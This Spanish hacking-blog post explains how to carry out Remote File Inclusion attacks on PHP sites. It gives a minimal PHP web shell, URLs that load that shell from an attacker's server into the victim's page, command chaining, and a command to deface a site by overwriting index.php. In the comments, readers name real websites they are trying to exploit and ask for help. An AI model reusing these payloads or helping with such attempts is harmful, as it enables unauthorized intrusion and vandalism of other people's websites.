« Windows Vista y Ms-Dos, puedes seguir con los comandos de siempre
Google, una muy buena herramienta Hack Parte I. »

Mar

6

Que es un ataque RFI(Remote File Inclusion)

Categorías: Comandos Hacking, Comenzando, General, Hacking Web, Vulnerabilidades | Enviado por: rush (14 artículos) |

Introduccion:

Esta vulneravilidad solo existe en Paginas programas en PHP, que te permite agregar enlaces a archivos remotos situados en otros servidores o paginas web, esta vulneravilidad es provocada por una mala programacion o un error al programar,En la cual Puedes entrar a muchos lados con los comandos.

La pagina puede ser vulnerable a ataques RFI si la url es masomenos similar a esta que tenemos aqui:

http://[servidor_victima]/index.php?.

Para obtener la shell de la web solo necesitamos este codigo:

http://[web o url de la web]/index.php?page=http://[web o servidor del atacante]/shell.txt&&cmd=ls.

Esa seria una web vulenerable.

Ejemplo:http//ww.rush.com/index.php?

Para poder hacer un ataque RFI tendremos que hacer esto:

http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(comando)

Para saber si es vulnerable en el block de notas pegas esto

<?

system($cmd)

?>

aora lo guardamos con el nombre de shell.txt y lo subomos a un servidore, de preferencia que no sea php para que no se ejecute en tu servidor.

Oora procedemos a usar esto:

http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(aqui va el comando.)

y listo asi explotaran el comando.

Un ejemplo de una shell explotada:

http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=pwd

pwd—> nos muestra en que parte del servidor estamos por ejemplo:

Home/host/www

Una Shell para sobreescribir un archivo es:

/shell.txt?&cmd=Defaced By: rUsH >index.php.

Para ejecutar mas de un comando solo usen esto “;”

/shell.txt?&cmd=[coamando];[Comando];[Comando]

Solo prodran sobreescribir si tiene permiso, para saber en que tienes permiso para modificar usa este comando

/shell.txt?&cmd=ls -la —> y te mostrara los permisos con sus respectivos archivos

Para saber los datos de la DB usa este comando:

/shell.txt?&cmd=cd

Es todo.

By:rUsH



Últimas entradas:


Comentarios


Entrada escrita en el día Martes, Marzo 6th, 2007 a las 12:58 am en las categorías Comandos Hacking, Comenzando, General, Hacking Web, Vulnerabilidades. Puedes encontrar las respuestas a este tema desde el RSS 2.0 feed. Puedes dejar una respuesta o hacer un trackback a tu página web.

13 Comentarios


  1. Jorge Abreu el Marzo 7, 2007 8:40 am

    Muy interesante, me gusto el blog, lo voy a tener en mis Links, espero pasar seguido.

    Sigan asi.

    Saludos.

  2. t4k3r0n el Marzo 7, 2007 8:57 am

    explica el por que este bug y alguna solucion……

    dare un pequeño adelanto…. al querer hacer un include , osea incluir un archivo ‘x’ por medio de la variable $_GET[’va’] osea que en la url se veria algo asi url/index.php?va=archivo.* entonces al hacer el include en el mismo codigo es cuando se encuentra el fallo por el simple hecho de no prohibir caracteres especiales con la funcion ireg() /* creo que es no me acuerdo mu bien ahorita entonces se maneja por medio de condiciones (if-else) ….. creo que deberias de hacerlo mas extenso

  3. Dembo_V2 el Marzo 13, 2007 9:18 pm

    Mira muy bueno el blog me encanto bueno trate de probarlo en una pagina pedora por asi decirlo…..

    miren en una me aparecio el blog de notas y lo modifique y lo guarde despues fui a ver si taba las modif y no taban ..

    trate de vuelta y ahora nda no me aparece…….
    ¿me podrian ayudar?

    Salu2.
    Dembo_V2

    PD: FELICITACIONES POR EL BLOG

  4. RERERE el Marzo 16, 2007 6:07 pm

    PERO YO CREO Y ES LA VERDAD QUE TAMBIEN EL REMOTE FILE INCLUSION TAMBIEN EXISTE EN PAGINAS .ASP DONDE TAMBIEN EXISTE SHELL COMO LA C99 ETC.

  5. ansatsu el Marzo 18, 2007 4:58 am

    si lo k kieren es buscar permisos
    find -perm 777
    SaLUdOs

  6. MEXICAN_MAX_TRON el Marzo 21, 2007 11:47 pm

    muy definido, tD

  7. vi-01 el Marzo 22, 2007 5:15 am

    Hola , tengo una duda ojala me ayuden :)
    cuando dices un ejemplo de shell explotada : http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=pwd

    tengo que ponerlo como url? para obtener la shell , se que la pregunta es un poco tonta pero sacame de duda ,o sino me puedes dar un link para poder leer mas sobre el tema , gracias de antemano ;)

  8. ptj_vrs el Marzo 29, 2007 10:19 pm

    Encontre Creo Yo Una Pag Que Es Bulnerable A El RFI La Encontre Poniendo En Google Esto –> /index.php?page= Y Me Dio varias Pag ,Es Esta : http://www.esdebian.org/staticpages/index.php?page=20050425051051556
    Pero Cuando Intento Esto :
    http://www.esdebian.org/staticpages/index.php?page=http://localhost/cmd.gif
    Me Aparece Esto:

    Access to this page is denied. Either the page has been moved/removed or you do not have sufficient permissions.

    No Se Como Hacerle He Estado Inntentando Hacer Este Hack Por 2 Dias Y No Puedo XDDDDD

  9. thehackyaz.blogspot.com listamsn.blogspot.com el Abril 1, 2007 1:27 am

    http://www.blusens.com/index2.php esta web puede ser explotada?

  10. zkual0 el Abril 12, 2007 11:44 pm

    para: ptj_vrs
    Encontre Creo Yo Una Pag Que Es Bulnerable A El RFI La Encontre Poniendo En Google Esto –> /index.php?page= Y Me Dio varias Pag ,Es Esta : http://www.esdebian.org/staticpages/index.php?page=20050425051051556
    Pero Cuando Intento Esto :
    http://www.esdebian.org/staticpages/index.php?page=http://localhost/cmd.gif
    Me Aparece Esto:

    Access to this page is denied. Either the page has been moved/removed or you do not have sufficient permissions.
    ***********************************************************
    oye amigo, no sera pq estas poniendo “http://localhost/cmd.gif” y pues realmente tu host no esta dado de alta como IP estatica. me refiero a ke tu IP es dinamica, te imaginas cuantas personas en el planeta podrian poner localhost al mismo tiempo? a donde se mandaria la informacion entonces? :S,
    pq no intentas utilizar EL NO-IP de..http://www.no-ip.com/ , para ke asi tengas un host “estatico”, con una ip dinamica :)
    Saludos! :)

  11. mvkmauro el Octubre 9, 2007 7:24 pm

    hola me pregunto cuales son los comandos ? disculpen la molestia si alguien podria escribirlos ? o darme algun link donde pueda fijarme desde ya muchas gracias

  12. hacked by el Octubre 29, 2007 7:20 pm

    veran encontre una web vulnerable a RFI pero aora tengo un problema cuando cargo la pagina

    http:www.webvulnerable.com/index.php?page=http://webatakante.com/r57.txt

    bien me carga la pagina pero me lo carga en txt

    y eso es un problema por k no puedo ejecutar comandos ni en la pagina ni en la barra del explorador

    ayudenme es 100% vulnerable a RFI y no todos los dias te encuentras una

  13. D'accord el Abril 8, 2008 1:25 pm

    Ma molao un montón, por desgracia no estoy tan puesto como para hacer este tipo de cosas.
    Gracias por todo.

    P.D.: Si hay algo mas sencillo para empezar con este tema colgadlo please

Nombre (obligatorio)

Email (obligatorio)

Página web

XHTML: Puedes usar los tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Comparte tus pensamientos

  • Importante!

    Los autores de este blog pretenden informar sobre seguridad, vulnerabilidades, técnicas hack, hablar sobre lo último en hacking...

    Profile Las herramientas, trucos, comandos, artículos... explicados en este blog NUNCA deberán ser usados de forma maligna para delinquir o dañar a terceros. No nos hacemos responsables de la mala interpretación ni del mal uso de cualquier contenido del blog.

    Todo lo que se habla en este blog está en internet (o proviene de alguno de los autores) y se puede consultar de forma libre. Si obtienes información de este blog para tu espacio, página web, blog... no olvides ponernos como fuente :).

  • Acerca de

    Profile

    El Blog del Hacker es una web llevada por usuarios de ForoHack.com perteneciente a la web ElHacker.com

    Si quieres colaborar con nosotros lo puedes hacer de forma abierta en nuestros foros y siendo un usuario frecuente podrás ser Autor de este blog.

    El objetivo principal de este blog es dar a conocer desde nuestro propio punto de vista el hacking en la red para Windows o Linux, conocer como funcionan las cosas, hacer más segura la red encontrando vulnerabilidades,... nunca para hacer el mal, estafar, ni nada parecido. Siempre de buen rollo =) Cuanto más se hable de forma abierta sobre estos temas más usuarios y empresas los conocerán y menos nos afectarán (será más segura la red)

    Últimos Comentarios

    Entradas más populares

  • Feeds e Información

  • Registrarse